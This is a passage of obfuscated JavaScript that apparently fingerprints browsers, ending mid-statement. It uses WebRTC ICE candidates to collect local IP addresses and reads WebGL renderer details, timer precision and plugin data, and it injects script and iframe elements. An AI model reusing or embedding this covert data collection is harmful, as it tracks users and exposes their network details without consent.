td_3A.td_0j("\x33\x35\x35\x32\x65\x30\x35\x37\x66\x66\x61\x30\x34\x61\x36\x32\x38\x39\x33\x31\x37\x61\x62\x63\x33\x33\x33\x31\x62\x36\x66\x64\x30\x33\x31\x62\x30\x35\x31\x63\x35\x35\x31\x65\x30\x35\x30\x36\x35\x34\x35\x31\x34\x66\x30\x30\x31\x61\x35\x31\x31\x38\x30\x33\x31\x65\x34\x65\x35\x36\x35\x33\x34\x35\x31\x35\x30\x31\x33\x63\x35\x61\x35\x64\x34\x37\x35\x34\x31\x30\x35\x38\x30\x37\x30\x38\x36\x63\x35\x63\x34\x35\x30\x66\x34\x33\x34\x37\x35\x30\x35\x35\x31\x34\x31\x32\x30\x32\x36\x66\x35\x31\x31\x39\x34\x32\x35\x37\x34\x61\x35\x37\x35\x32\x35\x64\x36\x38\x30\x38\x31\x32\x35\x65\x31\x35\x34\x34\x35\x36\x35\x33\x31\x30\x34\x32\x30\x35\x33\x62\x35\x61\x34\x35\x34\x33\x30\x34\x35\x38\x35\x33\x35\x34\x35\x39\x30\x32\x30\x66\x30\x35\x35\x31\x34\x30\x30\x34\x30\x63\x34\x36\x34\x64\x34\x62\x35\x64\x30\x62\x30\x38\x31\x35\x31\x30\x30\x32\x35\x64\x34\x30\x34\x33\x35\x65\x31\x30\x34\x32\x35\x62\x31\x30\x35\x30\x34\x35\x34\x30\x35\x36\x31\x35\x35\x33\x35\x61\x35\x61\x31\x36\x30\x61\x30\x34\x34\x34\x35\x31"); function td_3Q(){var td_zn=1;var td_uG=td_zn+":"+td_0s+":"+td_1o+";"+td_3E;var td_CS=td_1o;var td_Ml={};var td_tK={};var td_U9={};td_Ml[td_3A.tdz_3552e057ffa04a6289317abc3331b6fd.td_f(0,7)]=false;td_Ml[td_3A.tdz_3552e057ffa04a6289317abc3331b6fd.td_f(7,9)]=false; var td_A8=null;var td_Dq=false;var td_uL=td_W();var td_mD=false;this.tryAgain=function(){return !td_Dq;};function td_O3(){var td_oG="";if(Object.keys(td_Ml).length>0){var td_eo=Object.keys(td_Ml).filter(function(td_l4){return td_Ml[td_l4]; });if(td_eo.length>0){td_oG+=td_3A.tdz_3552e057ffa04a6289317abc3331b6fd.td_f(16,20)+td_eo.join(",");}}if(Object.keys(td_tK).length>0){var td_aX=Object.keys(td_tK).filter(function(td_sh){return td_tK[td_sh]; });if(td_aX.length>0){td_oG+=td_3A.tdz_3552e057ffa04a6289317abc3331b6fd.td_f(36,20)+td_aX.join(",");}}if(Object.keys(td_U9).length>0){var td_uh=Object.keys(td_U9).filter(function(td_jR){return td_U9[td_jR]; });if(td_uh.length>0){td_oG+=td_3A.tdz_3552e057ffa04a6289317abc3331b6fd.td_f(56,13)+td_uh.join(",");}}return td_oG;}this.getFPParams=function(){if(!td_Dq){if(((new Date()).getTime()-td_uL)>2000||td_mD){var td_dJ=td_O3(); if(td_dJ.length>0){td_Dq=true;td_A8.close();td_A8=null;return td_dJ;}}}return null;};this.setup=function(){if(!Object||!Object.create){td_Dq=true;return;}var td_Gz=window.RTCPeerConnection||window.mozRTCPeerConnection||window.webkitRTCPeerConnection; if(!td_Gz){td_Dq=true;return;}this.startWaitTime=td_W();function td_oD(td_zP){var td_OX=td_zP.substr(td_zP.indexOf(td_3A.tdz_3552e057ffa04a6289317abc3331b6fd.td_f(69,10))+10).split(" ");if(td_OX!==null&&td_OX.length>7&&td_OX[4]!==null){var td_g9=td_OX[4]; var td_s0=td_OX[7];if(td_g9.match(/^[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7}$/)){td_U9[td_g9]=true;}else{if(td_s0===Number(481469).toString(30)){td_Ml[td_g9]=true;}else{td_tK[td_g9]=true;}}}}try{var td_oM={optional:[{RtpDataChannels:true}]}; var td_QP=td_3A.tdz_3552e057ffa04a6289317abc3331b6fd.td_f(79,5)+td_0F+td_3A.tdz_3552e057ffa04a6289317abc3331b6fd.td_f(84,11);var td_Hg={iceServers:[{urls:td_QP+td_3A.tdz_3552e057ffa04a6289317abc3331b6fd.td_f(95,3),username:td_uG,credential:td_CS},{urls:td_QP+td_3A.tdz_3552e057ffa04a6289317abc3331b6fd.td_f(98,3),username:td_uG,credential:td_CS}]}; td_A8=new td_Gz(td_Hg,td_oM);td_A8.onicecandidate=function(td_Vo){if(td_Vo.candidate){td_oD(td_Vo.candidate.candidate);}else{td_mD=true;}};td_A8.onicegatheringstatechange=function(){if(td_A8!==null){if(td_A8.iceGatheringState===td_3A.tdz_3552e057ffa04a6289317abc3331b6fd.td_f(101,8)){td_mD=true; }}};td_A8.createDataChannel(Math.random().toString());var td_ft=function(){};var td_Ko=function(td_mF){td_A8.setLocalDescription(td_mF,function(){},td_ft);};var td_iq=function(){};if(typeof Promise===[][[]]+""||td_A8.createOffer.length>0){td_A8.createOffer(td_Ko,td_iq); }else{td_A8.createOffer().then(td_Ko,td_iq);}}catch(td_iT){return;}};}td_3A.tdz_117aa92c027943c2872cad7fdbd5e88c=new td_3A.td_0j("\x31\x31\x37\x61\x61\x39\x32\x63\x30\x32\x37\x39\x34\x33\x63\x32\x38\x37\x32\x63\x61\x64\x37\x66\x64\x62\x64\x35\x65\x38\x38\x63\x34\x33\x35\x64\x34\x34\x30\x63\x30\x34\x34\x61\x34\x31\x30\x32\x35\x37\x35\x37\x35\x38\x35\x37\x35\x39\x35\x36\x31\x30\x34\x31\x35\x39\x35\x30\x35\x37"); var td_3A=td_3A||{};function td_Zt(td_FI){if(td_FI.data===td_3A.tdz_117aa92c027943c2872cad7fdbd5e88c.td_f(0,3)){td_1i();}}if(window.addEventListener){window.addEventListener(td_3A.tdz_117aa92c027943c2872cad7fdbd5e88c.td_f(3,7),td_Zt,false); }else{window.attachEvent(td_3A.tdz_117aa92c027943c2872cad7fdbd5e88c.td_f(10,9),td_Zt);}td_3A.tdz_b21c7202889749558ef233fbc2beb73b=new td_3A.td_0j("\x62\x32\x31\x63\x37\x32\x30\x32\x38\x38\x39\x37\x34\x39\x35\x35\x38\x65\x66\x32\x33\x33\x66\x62\x63\x32\x62\x65\x62\x37\x33\x62\x35\x39\x31\x32\x37\x34\x33\x62\x36\x33\x36\x64\x34\x34\x35\x37\x34\x30\x34\x63\x34\x63\x34\x35\x35\x31\x36\x36\x35\x33\x35\x63\x35\x34\x31\x31\x30\x33\x34\x30\x36\x63\x35\x32\x30\x38\x30\x62\x31\x30\x35\x64\x31\x36\x31\x37\x30\x64\x34\x37\x35\x61\x30\x31\x33\x35\x37\x37\x37\x33\x32\x38\x37\x65\x36\x36\x36\x66\x37\x37\x36\x30\x36\x63\x36\x36\x34\x33\x35\x31\x34\x31\x34\x31\x34\x30\x34\x61\x30\x30\x33\x39\x35\x34\x35\x61\x35\x66\x31\x32\x30\x37\x31\x31\x36\x64\x30\x33\x30\x62\x30\x62\x34\x34\x35\x63\x31\x36\x31\x30\x35\x64\x34\x31\x30\x61\x35\x34\x37\x66\x37\x66\x36\x38\x36\x37\x37\x64\x36\x31\x36\x33\x36\x62\x34\x64\x35\x30\x34\x64\x34\x63\x31\x30\x31\x34\x35\x37\x36\x63\x35\x35\x30\x66\x30\x65\x31\x37\x35\x37\x31\x30\x33\x61\x30\x33\x35\x39\x35\x61\x31\x31\x30\x64\x34\x36\x34\x33\x30\x63\x34\x37\x35\x62\x35\x33\x37\x63\x35\x37\x34\x63\x31\x39\x35\x36\x34\x32\x35\x38\x35\x63\x35\x39\x35\x39\x30\x37\x30\x61\x35\x37\x35\x35\x34\x36\x30\x38\x30\x31\x31\x37\x35\x62\x30\x64\x30\x62\x33\x35\x37\x32\x37\x31\x32\x35\x32\x65\x36\x64\x35\x35\x30\x36\x35\x35\x34\x37\x35\x37\x36\x64\x34\x61\x35\x64\x35\x37\x35\x33\x35\x31\x34\x62\x35\x30\x34\x37\x36\x37\x30\x63\x30\x38\x35\x34\x35\x63\x35\x63\x30\x34\x30\x38\x30\x36\x35\x31\x31\x36\x31\x36\x31\x36\x34\x35\x35\x61\x30\x63\x30\x35\x31\x34\x34\x36\x30\x34\x35\x62\x34\x34\x30\x64\x31\x34\x34\x66\x35\x66\x35\x35\x34\x35\x30\x39"); var td_3A=td_3A||{};function td_0z(){try{var td_bJ=td_T1();if(td_bJ===0||td_bJ===-1){return;}var td_c0=td_bJ.gl;var td_yt=td_bJ.name;td_yt+=td_c0.getParameter(td_c0.VERSION);td_yt+=td_c0.getParameter(td_c0.SHADING_LANGUAGE_VERSION); td_yt+=td_c0.getParameter(td_c0.VENDOR);td_yt+=td_c0.getParameter(td_c0.RENDERER);var td_ru=[];try{td_ru=td_c0.getSupportedExtensions();}catch(td_hG){}var td_m1=td_ru.length;if(td_m1){var td_tx="";for(var td_Sn=0; td_Sn<td_m1;td_Sn++){if(td_tx.length){td_tx+=td_3A.tdz_b21c7202889749558ef233fbc2beb73b.td_f(0,2);}td_tx+=td_ru[td_Sn];}td_yt+=td_tx;}var td_M7;var td_hG=td_c0.getExtension(td_3A.tdz_b21c7202889749558ef233fbc2beb73b.td_f(2,30))||td_c0.getExtension(td_3A.tdz_b21c7202889749558ef233fbc2beb73b.td_f(32,37))||td_c0.getExtension(td_3A.tdz_b21c7202889749558ef233fbc2beb73b.td_f(69,34)); if(td_hG){td_M7=td_c0.getParameter(td_hG.MAX_TEXTURE_MAX_ANISOTROPY_EXT);if(td_M7===0){td_M7=2;}}else{td_M7=td_3A.tdz_b21c7202889749558ef233fbc2beb73b.td_f(103,13);}td_yt+=td_M7;return td_yt;}catch(td_hG){return null; }}function td_3a(){try{var td_gi=td_T1();if(td_gi===0||td_gi===-1){return;}var td_fU=td_gi.gl;if(typeof td_fU.getExtension!==td_3A.tdz_b21c7202889749558ef233fbc2beb73b.td_f(116,8)||typeof td_fU.getParameter!==td_3A.tdz_b21c7202889749558ef233fbc2beb73b.td_f(116,8)){return null; }var td_VS=td_fU.getExtension(td_3A.tdz_b21c7202889749558ef233fbc2beb73b.td_f(124,25));if(!td_VS||typeof td_VS!==td_3A.tdz_b21c7202889749558ef233fbc2beb73b.td_f(149,6)){return null;}var td_al="";var td_mX=td_fU.getParameter(td_VS.UNMASKED_VENDOR_WEBGL); if(typeof td_mX===td_3A.tdz_b21c7202889749558ef233fbc2beb73b.td_f(155,6)){td_al+=td_3A.tdz_b21c7202889749558ef233fbc2beb73b.td_f(161,6)+encodeURIComponent(td_mX);}var td_mu=td_fU.getParameter(td_VS.UNMASKED_RENDERER_WEBGL); if(typeof td_mu===td_3A.tdz_b21c7202889749558ef233fbc2beb73b.td_f(155,6)){td_al+=td_3A.tdz_b21c7202889749558ef233fbc2beb73b.td_f(167,6)+encodeURIComponent(td_mu);}return td_al;}catch(td_Y1){return null; }}td_3A.tdz_35057aa2b48944db9f019a2f0eb0c65e=new td_3A.td_0j("\x33\x35\x30\x35\x37\x61\x61\x32\x62\x34\x38\x39\x34\x34\x64\x62\x39\x66\x30\x31\x39\x61\x32\x66\x30\x65\x62\x30\x63\x36\x35\x65\x34\x37\x35\x31\x34\x32\x36\x61\x34\x34\x30\x32\x31\x33\x35\x62\x31\x32\x34\x30\x36\x62\x37\x61\x36\x36\x37\x64\x33\x34\x33\x36\x35\x30\x30\x32\x34\x34\x35\x34\x34\x31\x31\x35\x31\x64\x30\x63\x35\x31\x31\x33\x30\x33\x34\x33\x30\x30\x34\x34\x35\x63\x31\x35\x34\x37\x35\x39\x35\x66\x35\x34\x35\x33\x30\x34\x30\x35\x35\x31\x30\x64\x35\x39\x34\x38\x35\x35\x35\x31\x34\x30\x30\x31\x31\x31\x34\x62\x30\x35\x35\x39\x35\x63\x35\x65\x32\x38\x37\x66\x32\x31\x35\x31\x30\x39\x31\x36\x35\x35\x30\x65\x34\x36\x34\x31\x31\x63\x34\x30\x34\x31\x34\x39\x35\x39\x35\x32\x31\x37\x30\x38\x34\x31\x30\x62\x35\x36\x35\x31\x35\x35\x35\x64\x34\x30\x31\x64\x35\x38\x35\x31\x30\x66\x35\x34\x35\x35\x35\x63\x30\x66"); function td_0Z(td_I){var td_V="";var td_i=function(){var td_z=Math.floor(Math.random()*62);if(td_z<10){return td_z;}if(td_z<36){return String.fromCharCode(td_z+55);}return String.fromCharCode(td_z+61); };while(td_V.length<td_I){td_V+=td_i();}return td_3A.tdz_35057aa2b48944db9f019a2f0eb0c65e.td_f(0,4)+td_V;}function td_1p(td_r){var td_K=td_0Z(5);if(typeof(td_3j)!==[][[]]+""){td_3j(td_K,td_r);}return td_K; }function td_2b(td_f,td_S,td_Z){var td_I=td_S.getElementsByTagName(Number(103873).toString(18)).item(0);var td_V=td_S.createElement(td_3A.tdz_35057aa2b48944db9f019a2f0eb0c65e.td_f(4,6));var td_i=td_1p(td_3A.tdz_35057aa2b48944db9f019a2f0eb0c65e.td_f(10,6)); td_V.setAttribute(td_3A.tdz_35057aa2b48944db9f019a2f0eb0c65e.td_f(16,2),td_i);td_V.setAttribute(Number(1285914).toString(35),td_3A.tdz_35057aa2b48944db9f019a2f0eb0c65e.td_f(18,15));td_3A.td_0X(td_V);if(typeof td_Z!==[][[]]+""){var td_H=false; td_V.onload=td_V.onreadystatechange=function(){if(!td_H&&(!this.readyState||this.readyState===td_3A.tdz_35057aa2b48944db9f019a2f0eb0c65e.td_f(33,6)||this.readyState===td_3A.tdz_35057aa2b48944db9f019a2f0eb0c65e.td_f(39,8))){td_H=true; td_Z();}};td_V.onerror=function(td_F){td_H=true;td_Z();};}td_V.setAttribute(td_3A.tdz_35057aa2b48944db9f019a2f0eb0c65e.td_f(47,3),td_f);td_I.appendChild(td_V);}function td_0f(td_c,td_I,td_w,td_H){var td_m=td_H.createElement(td_3A.tdz_35057aa2b48944db9f019a2f0eb0c65e.td_f(50,3)); var td_n=td_1p(td_3A.tdz_35057aa2b48944db9f019a2f0eb0c65e.td_f(53,3));td_m.setAttribute(td_3A.tdz_35057aa2b48944db9f019a2f0eb0c65e.td_f(16,2),td_n);td_m.setAttribute(td_3A.tdz_35057aa2b48944db9f019a2f0eb0c65e.td_f(56,3),td_3A.tdz_35057aa2b48944db9f019a2f0eb0c65e.td_f(59,5)); td_m.setAttribute(td_3A.tdz_35057aa2b48944db9f019a2f0eb0c65e.td_f(64,5),td_3A.tdz_35057aa2b48944db9f019a2f0eb0c65e.td_f(69,17));td_m.setAttribute(td_3A.tdz_35057aa2b48944db9f019a2f0eb0c65e.td_f(47,3),td_I); if(typeof td_w!==[][[]]+""){td_m.onload=td_w;td_m.onabort=td_w;td_m.onerror=td_w;td_m.oninvalid=td_w;}td_c.appendChild(td_m);}function td_3C(td_J,td_x){var td_w=td_x.getElementsByTagName(Number(103873).toString(18))[0]; td_0f(td_w,td_J,null,td_x);}td_3A.tdz_8ea55f71e7ab4460b58b35e944a6393c=new td_3A.td_0j("\x38\x65\x61\x35\x35\x66\x37\x31\x65\x37\x61\x62\x34\x34\x36\x30\x62\x35\x38\x62\x33\x35\x65\x39\x34\x34\x61\x36\x33\x39\x33\x63\x37\x65\x30\x63\x31\x33\x35\x30\x35\x33\x30\x39\x34\x66\x36\x32\x30\x34\x35\x31\x30\x30\x31\x30\x35\x64"); var td_3A=td_3A||{};function td_2H(){var td_vi=20;var td_di=10;var td_qz=10;var td_ax=0;var td_Cw=null;var td_TF=function(){return window.performance.now()*1000;};var td_p1=function(){return performance.now().toFixed(3)/1000; };var td_gb=function(){return(td_W()-td_ax).toFixed(3)*1000;};function td_IJ(){var td_nr=1;var td_ye=td_Cw();var td_mC=td_Cw();while(td_mC===td_ye){td_mC=td_Cw();++td_nr;}var td_nL=(td_mC-td_ye)*1000000; var td_Vg=td_nr/td_nL;if(td_Vg<1e-8){return 1e-8;}return td_Vg;}function td_OD(){var td_hz=0;var td_R1=0;try{var td_NZ=td_IJ();td_hz=td_Cw();td_R1=td_Cw()-td_hz;if(td_R1===0||td_R1<1e-8){td_R1=td_NZ;}for(var td_IY=0; td_IY<td_vi;++td_IY){td_R1=td_Qn(td_R1,(td_Cw()-td_hz));}return(Math.round(1/td_R1));}catch(td_lV){return -1;}}function td_Qn(td_vN,td_u5){try{if(td_vN<1e-8){return td_u5;}if(td_vN<td_u5){return td_Qn(td_u5-Math.floor(td_u5/td_vN)*td_vN,td_vN); }else{if(td_vN===td_u5){return td_vN;}else{return td_Qn(td_u5,td_vN);}}}catch(td_Mn){return 0;}}function td_Jm(td_uh){if(td_uh.length<1){return 0;}var td_Un=0;for(var td_xX=0;td_xX<td_uh.length;++td_xX){td_Un+=td_uh[td_xX]; }return Math.floor(td_Un/td_uh.length);}function td_MG(td_dC,td_k3){if(td_dC.length<2){return 0;}var td_I9=0;for(var td_Wz=0;td_Wz<td_dC.length;++td_Wz){td_I9+=Math.pow(td_dC[td_Wz]-td_k3,2);}return Math.floor(Math.sqrt(td_I9/td_dC.length)); }function td_po(td_pH,td_O6,td_m4,td_lx){if(td_pH.length<1){return 0;}var td_gB=[];var td_LQ=td_m4+(td_O6*td_lx);var td_bK=td_m4-(td_O6*td_lx);for(var td_EC=0;td_EC<td_pH.length;td_EC++){if(td_pH[td_EC]>td_bK&&td_LQ>td_pH[td_EC]){td_gB.push(td_pH[td_EC]); }}return td_gB;}if(td_1x.td_1m!==td_3A.tdz_8ea55f71e7ab4460b58b35e944a6393c.td_f(0,7)&&td_1x.td_1m!==td_3A.tdz_8ea55f71e7ab4460b58b35e944a6393c.td_f(7,6)&&typeof performance!==[][[]]+""&&typeof performance.now!==[][[]]+""){td_Cw=td_p1; }else{if(td_1x.td_1m!==td_3A.tdz_8ea55f71e7ab4460b58b35e944a6393c.td_f(7,6)&&typeof window.performance!==[][[]]+""&&typeof window.performance.now!==[][[]]+""){td_Cw=td_TF;}else{td_ax=td_W();td_Cw=td_gb; }}if(!td_Cw||!Math||!Math.round||!Math.floor||!Math.sqrt||!Math.pow){return null;}function td_O4(){var td_gy=[];for(var td_QF=0;td_QF<td_di;++td_QF){td_gy.push(td_OD());}var td_BN=td_Jm(td_gy);var td_kW=td_MG(td_gy,td_BN); var td_Mg=0;var td_kQ=0;if(td_kW!==0){var td_Th=td_po(td_gy,td_kW,td_BN,1);td_kQ=td_Jm(td_Th);td_Mg=Math.round(td_kQ);}else{td_Mg=Math.round(td_BN);}return td_Mg;}var td_H6=0;var td_Oz=0;while(td_H6===0&&td_Oz++<td_qz){td_H6=td_O4(); }return encodeURIComponent(td_H6);}td_3A.tdz_4df616182afe4219b7a0393c7b7a49db=new td_3A.td_0j("\x34\x64\x66\x36\x31\x36\x31\x38\x32\x61\x66\x65\x34\x32\x31\x39\x62\x37\x61\x30\x33\x39\x33\x63\x37\x62\x37\x61\x34\x39\x64\x62\x35\x32\x30\x35\x30\x61\x34\x35\x35\x34\x35\x37\x34\x31\x34\x38\x35\x65\x30\x38\x30\x35\x30\x34\x34\x30\x35\x62\x35\x65\x35\x37\x34\x64\x34\x66\x34\x63\x34\x33\x35\x62\x35\x36\x35\x30\x30\x38\x34\x30\x30\x33\x34\x31\x30\x34\x31\x39\x35\x66\x30\x38\x30\x33\x34\x37\x30\x63\x30\x37\x34\x36\x34\x31\x35\x61\x35\x38\x35\x62\x35\x33\x31\x35\x30\x66\x30\x61\x35\x61\x31\x64\x35\x37\x34\x63\x31\x36\x34\x32\x31\x33\x35\x35\x34\x30\x34\x39\x35\x66\x30\x32\x34\x34\x30\x61\x35\x36\x31\x31\x34\x34\x35\x35\x30\x64\x30\x31\x35\x35\x31\x30\x30\x66\x35\x39\x35\x66\x31\x39\x34\x39\x31\x35\x35\x66\x31\x31\x30\x61\x30\x34\x34\x64\x35\x37\x34\x33\x30\x62\x30\x33\x34\x37\x31\x31\x35\x63\x35\x61\x35\x61\x35\x32\x31\x37\x35\x65\x30\x64\x35\x39\x34\x65\x35\x35\x34\x61\x31\x63\x30\x33\x34\x34\x31\x34\x30\x61\x35\x66\x35\x32\x35\x37\x34\x35\x35\x31\x35\x64\x30\x66\x34\x39\x31\x35\x35\x30\x35\x34\x30\x39\x31\x37\x35\x32\x31\x38\x30\x64\x35\x31\x34\x37\x35\x63\x34\x31\x31\x35\x35\x65\x30\x36\x35\x32\x30\x65\x31\x62\x34\x38\x31\x31\x30\x62\x35\x37\x30\x66\x31\x32\x35\x66\x35\x63\x35\x33\x35\x30\x34\x38\x34\x32\x30\x64\x30\x66\x30\x36\x35\x35\x34\x36\x35\x38\x35\x36\x30\x63\x31\x38\x31\x39\x31\x64\x34\x32\x34\x63\x35\x61\x30\x30\x35\x63\x31\x36\x35\x65\x30\x63\x35\x31\x34\x39\x30\x38\x30\x33\x34\x64\x30\x31\x31\x34\x35\x66\x35\x63\x35\x37\x35\x36\x35\x64\x31\x64\x31\x39\x34\x62\x30\x38\x35\x35\x35\x31\x34\x31\x35\x38\x30\x62\x35\x39\x31\x35\x35\x39\x35\x65\x35\x38\x35\x34\x30\x36\x31\x38\x31\x61\x31\x61\x31\x30\x34\x31\x35\x30\x30\x37\x30\x39\x34\x30\x30\x64\x30\x62\x35\x33\x35\x30\x34\x36\x34\x31\x35\x34\x35\x62\x30\x32\x30\x37\x31\x31\x35\x64\x35\x64\x35\x66\x31\x36\x31\x61\x31\x61\x30\x35\x35\x39\x34\x31\x35\x63\x35\x30\x31\x37\x35\x38\x31\x30\x35\x36\x31\x31\x34\x34\x35\x35\x30\x64\x30\x31\x35\x35\x31\x30\x30\x66\x35\x39\x35\x66\x31\x39\x34\x37\x35\x36\x35\x36\x34\x66\x31\x34\x30\x62\x31\x39\x34\x30\x35\x34\x35\x38\x30\x65\x34\x37\x30\x64\x35\x31\x34\x61\x35\x63\x34\x31\x34\x65\x35\x64\x30\x33\x34\x31\x30\x30\x34\x37\x35\x61\x31\x36\x30\x62\x34\x34\x31\x30\x35\x33\x31\x38\x30\x31\x35\x37\x34\x31\x34\x38\x35\x65\x30\x38\x30\x35\x30\x34\x34\x30\x35\x62\x35\x65\x35\x37\x34\x64\x34\x66\x34\x63\x34\x36\x35\x66\x35\x61\x31\x65\x31\x33\x35\x62\x31\x37\x35\x30\x30\x38\x35\x61\x35\x38\x31\x34\x31\x32\x35\x38\x30\x64\x30\x35\x35\x37\x34\x35\x35\x66\x35\x65\x35\x36\x31\x64\x31\x39\x34\x62\x30\x31\x35\x31\x34\x34\x35\x30\x35\x35\x31\x34\x34\x35\x31\x39\x35\x39\x35\x65\x35\x38\x35\x34\x30\x36\x31\x38\x31\x31\x34\x31\x30\x36\x31\x39\x34\x31\x30\x39\x30\x65\x35\x64\x30\x39\x30\x37\x35\x31\x35\x34\x31\x39\x34\x32\x34\x65\x35\x35\x34\x61\x31\x65\x30\x38\x35\x38\x35\x33\x34\x31\x34\x39\x30\x65\x35\x65\x30\x32\x35\x31\x34\x37\x35\x30\x35\x63\x30\x64\x31\x38\x31\x61\x31\x61\x30\x62\x35\x35\x34\x66\x30\x35\x34\x66\x35\x35\x31\x34\x31\x36\x35\x61\x35\x34\x34\x32\x35\x30\x34\x38\x34\x32\x30\x64\x30\x66\x30\x36\x35\x35\x34\x36\x35\x38\x35\x36\x30\x63\x31\x38\x31\x39\x31\x64\x35\x39\x35\x38\x34\x35\x30\x32\x31\x61\x31\x34\x35\x61\x30\x30\x34\x34\x34\x39\x30\x38\x30\x62\x35\x37\x30\x35\x31\x32\x35\x66\x35\x65\x35\x38\x31\x65\x34\x30\x31\x66\x30\x62\x30\x37\x31\x33\x35\x35\x31\x66\x35\x33\x35\x63\x30\x33\x35\x39\x33\x32\x35\x38\x35\x63\x35\x61\x35\x38\x31\x34\x35\x36\x31\x34\x35\x32\x32\x37\x35\x38\x35\x38\x31\x37\x30\x61\x31\x61\x33\x37\x30\x65\x35\x39\x35\x32\x35\x64\x34\x36\x35\x39\x34\x34\x30\x34\x32\x30\x30\x39\x35\x35\x34\x31\x35\x39\x35\x38\x30\x65\x34\x30\x30\x30\x34\x39\x34\x30\x30\x66\x31\x66\x35\x33\x31\x62\x35\x30\x30\x36\x34\x64\x30\x34\x31\x64\x31\x32\x30\x37\x34\x36\x31\x37\x30\x66\x35\x39\x35\x66\x34\x31\x35\x63\x34\x38\x35\x65\x30\x30\x31\x66\x30\x30\x34\x36\x31\x63\x35\x65\x35\x61\x31\x61\x36\x37\x32\x35\x37\x36\x31\x64\x34\x39\x35\x37\x30\x35\x37\x34\x31\x36\x34\x35\x30\x64\x37\x35\x35\x61\x31\x36\x30\x64\x36\x34\x32\x30\x32\x30\x31\x38\x36\x31\x37\x32\x37\x37\x31\x36\x30\x33\x34\x66\x35\x37\x35\x31\x31\x61\x30\x32\x30\x36\x31\x37\x35\x32\x31\x38\x30\x64\x35\x31\x34\x37\x35\x63\x34\x31\x33\x32\x34\x32\x30\x62\x35\x34\x30\x61\x36\x30\x35\x30\x30\x39\x30\x37\x31\x61\x33\x35\x31\x33\x35\x66\x35\x32\x35\x64\x36\x35\x35\x31\x35\x66\x30\x34\x33\x35\x33\x32\x37\x37\x34\x36\x35\x64\x31\x37\x33\x31\x36\x30\x32\x32\x34\x34\x35\x66\x34\x61\x34\x37\x31\x31\x35\x65\x30\x63\x35\x30\x34\x66\x30\x63\x31\x37\x35\x33\x32\x33\x35\x37\x31\x30\x30\x66\x34\x30\x35\x34\x36\x65\x37\x65\x35\x61\x35\x38\x30\x34\x30\x35\x31\x31\x34\x34\x35\x65\x34\x34\x35\x65\x30\x62\x35\x39\x33\x65\x35\x36\x35\x66\x35\x38\x34\x30\x30\x62\x36\x39\x31\x32\x35\x62\x31\x34\x35\x33\x35\x30\x30\x61\x33\x64\x34\x33\x30\x64\x30\x38\x35\x32\x35\x65\x34\x31\x34\x32\x36\x37\x35\x66\x30\x34\x30\x32\x30\x63\x35\x35\x36\x64\x34\x31\x35\x35\x30\x33\x34\x65\x30\x34\x34\x32\x36\x64\x34\x39\x35\x66\x31\x36\x35\x30\x30\x62\x35\x39\x33\x65\x35\x35\x35\x64\x30\x62\x30\x30\x35\x31\x33\x62\x30\x37\x35\x35\x34\x33\x35\x39\x35\x33\x35\x39\x34\x36\x33\x66\x31\x36\x30\x39\x34\x31\x35\x35\x35\x38\x35\x37\x33\x64\x34\x36\x31\x34\x35\x39\x35\x30\x35\x32\x34\x37\x30\x61\x35\x61\x30\x37\x36\x39\x31\x31\x35\x38\x34\x63\x30\x33\x30\x62\x35\x61\x33\x62\x31\x35\x35\x65\x35\x65\x35\x35\x35\x61\x34\x66\x35\x33\x31\x37\x30\x33\x33\x62\x34\x34\x35\x65\x34\x34\x35\x65\x30\x62\x35\x39\x33\x65\x34\x32\x35\x36\x35\x38\x35\x66\x31\x33\x35\x62\x30\x33\x34\x65\x30\x34\x34\x36\x36\x37\x31\x34\x30\x65\x34\x31\x30\x33\x30\x66\x35\x38\x36\x65\x34\x30\x35\x64\x35\x62\x36\x64\x31\x31\x30\x61\x30\x34\x34\x64\x35\x37\x34\x33\x36\x37\x31\x32\x35\x62\x31\x34\x35\x37\x35\x61\x35\x37\x36\x63\x30\x37\x35\x32\x31\x34\x35\x36\x30\x64\x34\x32\x34\x62\x33\x61\x31\x32\x35\x38\x31\x31\x30\x31\x35\x66\x35\x66\x36\x39\x34\x32\x34\x65\x35\x35\x33\x65\x31\x30\x30\x63\x35\x31\x34\x35\x35\x34\x34\x62\x33\x63\x34\x37\x30\x64\x34\x35\x35\x34\x35\x30\x35\x64\x33\x63\x35\x64\x30\x33\x34\x31\x30\x30\x36\x61"); function td_cJ(td_KL){var td_v1=td_KL.constructor==String?[td_KL]:td_KL;var td_EV=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5);var td_Gz=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5);var td_bk; for(td_bk=0;td_bk<td_v1.length;td_bk++){var td_dj=td_jF[td_v1[td_bk]];if(td_dj&&td_dj.enabledPlugin){var td_ad=td_dj.enabledPlugin;if(td_ad.name){td_EV=td_ad.name;}else{td_EV=Number(890830).toString(31); }td_Gz=td_ad.description;break;}}return[td_EV,td_Gz];}function td_rx(){var td_PL=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5);var td_uJ=td_cJ([td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(5,29),td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(34,24)]); var td_fs=td_uJ[0];var td_xQ=td_uJ[1];if(td_fs!==td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5)&&td_fs!==Number(890830).toString(31)&&(/Flash/i).test(td_fs)){td_PL=Number(890830).toString(31);}if(td_PL===Number(890830).toString(31)&&td_xQ){var td_ZS=/[\d][\d\,\.\s]*[rRdD]{0,1}[\d\,]*/.exec(td_xQ); if(td_ZS){td_PL=td_ZS[0];}}return td_PL;}function td_nJ(){var td_yT=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5);var td_Zk=td_cJ([td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(58,22),td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(80,15)]); var td_RT=td_Zk[0];if(td_RT!==td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5)&&td_RT!==Number(890830).toString(31)&&(/Windows.*Media.*Firefox Plugin.*/i).test(td_RT)){td_yT=Number(890830).toString(31); }return td_yT;}function td_II(){var td_pE=td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5);var td_F5=td_cJ([td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(95,15)]);var td_OG=td_F5[0];var td_FT=td_F5[1]; if(td_OG!==td_3A.tdz_4df616182afe4219b7a0393c7b7a49db.td_f(0,5)&&td_OG!==Number(890830).toString(31)&&(/Adobe 